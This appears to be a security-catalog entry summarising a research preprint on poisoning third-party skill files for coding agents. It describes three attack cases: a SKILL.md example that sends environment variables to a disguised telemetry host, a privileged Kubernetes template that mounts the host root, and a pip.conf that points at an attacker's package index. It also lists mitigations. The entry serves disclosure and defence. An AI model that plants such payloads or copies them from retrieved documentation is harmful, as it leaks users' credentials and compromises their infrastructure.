Evidence and verification: Paper-reported; independent reproduction is not documented.; Primary research source linked.
Severity: Not rated by this catalog.
Source and publication type: arXiv · Research preprint.; Peer-review status is not provided by this source.
Author and publication status: Author metadata is not stored; see the primary paper.
Threat model and attacker access: Black-box model, service, or application access.
Related deployment categories: Retrieval-augmented generation; Agent workflows; Taxonomy labels only; paper-specific deployment prerequisites are not inferred.
Affected systems: LLM-based coding agents that retrieve and execute third-party agent skills or rely on repository-provided documentation for tool-invocation workflows. Confirmed vulnerable systems include: Claude Code OpenHands Codex…

Research Paper

Supply-Chain Poisoning Attacks Against LLM Coding Agent Skill Ecosystems

Primary source: arXiv. Findings are reported by the cited research and have not been independently verified.

View Paper

Description

LLM-based coding agents are vulnerable to Document-Driven Implicit Payload Execution (DDIPE) via supply-chain poisoning of third-party agent skills. Attackers can embed malicious logic directly into legitimate-looking code examples and configuration templates within skill documentation files (e.g., SKILL.md). Because coding agents ingest this metadata into their context windows and treat the documentation as an authoritative reference, the underlying LLM silently reproduces and executes the embedded payload during routine task completion. This implicit execution bypasses both model-level safety alignment (which looks for imperative malicious instructions) and framework-level architectural guardrails, hijacking the agent's system-level action space (file I/O, shell commands, network requests) without requiring explicitly malicious user prompts.

Examples

Code Example Poisoning (Data Exfiltration): An attacker publishes a PDF-processing skill where the official SKILL.md contains a Python example for process_pdf(file_path). The example includes env_data = dict(os.environ) and a disguised telemetry request req("https://api.internal-log.com", data=env_data) wrapped in a try/except: pass block. When the agent uses the skill, it copies the reference implementation, silently exfiltrating host credentials.
Config Template Poisoning (Privilege Escalation): A skill documenting Kubernetes pod creation includes a YAML template with securityContext: privileged: true and volumeMounts: - name: host-root, mountPath: /host. When the agent is tasked with creating a pod, it applies the backdoored configuration verbatim, granting unauthorized host access.
Sandbox Semantic Bypass (Infrastructure Poisoning): An adversarial skill embeds a 479-byte pip configuration script that writes an extra-index-url pointing to an attacker-controlled repository into the workspace pip.conf. The agent reproduces this file, which bypasses standard path sandboxing since pip.conf is a legitimate workspace artifact, silently poisoning all subsequent package installations.

Impact

Successful exploitation allows an external attacker to achieve system control, Remote Code Execution (RCE), and persistent infrastructure compromise. Specifically, the vulnerability enables unauthorized read/write file operations, silent exfiltration of environment variables and configuration secrets, and the generation of backdoored Infrastructure-as-Code (IaC) files (e.g., tampered package manager configs, Ansible playbooks) that can propagate to production via automated CI/CD pipelines.

Affected Systems

LLM-based coding agents that retrieve and execute third-party agent skills or rely on repository-provided documentation for tool-invocation workflows. Confirmed vulnerable systems include:

Claude Code
OpenHands
Codex CLI
Gemini CLI (specifically amplified in headless/CI environments where the -p flag, non-TTY stdin, or CI=true bypasses execution confirmation).

Mitigation Steps

Prompt-Level Trust Boundaries: Inject mandatory security warnings into the agent's system message template explicitly marking all retrieved skill documentation and repository-provided content as untrusted (e.g., deployed in OpenHands PR #2XX5).
Semantic Permission Scoping: Disable default auto-trust of workspace folders in headless or CI/CD modes. Require strict, intent-based confirmation prompts for specific high-risk system interfaces (run_shell_command, write_file) when triggered by logic derived from external skills.
Multi-Model Verification: Deploy heterogeneous models for execution-decision ensemble voting. (Research demonstrates that single-model execution rates of up to 27.1% drop to a 1.6% joint-bypass rate across diverse LLMs due to model-specific alignment blind spots).
Intent-Level Semantic Auditing: Do not rely solely on syntactic sandbox boundaries (e.g., filesystem paths) or lexical keyword filters. Implement strict configuration anomaly scanning (e.g., detecting unauthorized registry URLs in generated pip.conf files) before permitting action-space execution.

Evidence

This entry is based on a primary research source. Its findings are paper-reported; independent reproduction and verification are not claimed.

https://arxiv.org/abs/2604.03081

Automated Stealth Skill Injection
Published February 1, 2026 · application-layer, prompt-layer, injection
Agent Policy Hacking
Published July 1, 2025 · application-layer, model-layer, prompt-layer
Inter-Agent Computer Takeover
Published July 1, 2025 · application-layer, prompt-layer, injection

Research context and confidence